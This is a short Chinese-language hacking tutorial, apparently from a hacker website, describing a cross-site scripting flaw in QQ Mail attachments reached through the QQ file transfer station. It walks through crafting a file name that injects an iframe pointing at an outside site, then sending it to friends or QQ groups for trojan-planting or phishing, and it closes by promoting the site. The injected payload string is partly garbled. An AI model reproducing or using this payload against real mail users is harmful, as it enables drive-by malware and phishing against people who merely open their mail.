一.挖掘过程
这次漏洞的位置是QQ邮箱附件,但是料方式不是常规的上传附件,需要通过QQ的文件中转站作为媒介。
以前挖掘QQ邮箱漏洞的时候我就想过这个地方,但是那时候同样的方式对它无效,后来和冷阳测试的时候发现QQ文件中转站对上传文件的验证很是敷衍,于是就想到了利用文件中转站发送附件给好友的这个功能进行挂马或者钓鱼攻击。
这次的漏洞还是比较不错的,对QQ群邮件和单独QQ邮件通杀,同时还可以单独使用。漏洞的原理和PHPWind附件文档名跨站脚本漏洞差不多。
二.利用方法
说了这么多,大家肯定都迫不及待了吧!下面我就教大家如何利用这个漏洞。首先我们进入QQ邮箱,点文件中转站,选择上传附件,并自己构造一个附件:D:\diaopai<iframe src=http:/www.leso99.comidth=800eight=800><0.000000iframe>XXS.rar就是利用代码,上传就可以了。上传完毕后刷新一下就可以看见这些伪造的附件了,文件大小是0kb。点击发送给好友就行了,也可以选择QQ个人和群邮件,发送后的效果那就应该不用我说了吧!这个漏洞的利用方法非常简单,我就不再啰嗦了。这个漏洞只适用于QQ邮箱,至于别的邮箱如何突破就靠大家努力了。
访问:www.leso99.com 分享更多精彩内容!
